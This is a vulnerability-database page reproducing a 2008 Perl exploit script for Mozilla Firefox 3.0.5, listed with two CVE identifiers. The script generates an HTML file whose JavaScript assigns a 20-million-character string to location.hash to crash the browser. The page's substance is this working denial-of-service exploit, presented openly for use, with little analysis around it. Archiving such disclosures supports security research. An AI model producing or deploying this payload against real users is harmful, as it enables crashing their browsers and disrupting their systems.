Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2009-2953 CVE-2008-5715

Publish Date: 23 Dec 2008

                							

                #!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP

$filename = $ARGV[0];
if(!defined($filename))
{

     print "Usage: $0 &lt;filename.html&gt;\n\n";

}

$head = "&lt;html&gt;" . "\n" . "&lt;script type=\"text/javascript\"&gt;" . "\n";
$trig = "location.hash = \"" . "A" x 20000000 . "\";" . "\n";
$foot = "&lt;/script&gt;" . "\n" . "&lt;/html&gt;";

$data = $head . $trig . $foot;

     open(FILE, '&gt;' . $filename);
     print FILE $data;
     close(FILE);

exit;

# milw0rm.com [2008-12-23]

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Mozilla Firefox 3.0.5 - location.hash Remote Crash

Vulmon Search

About

Products

Connect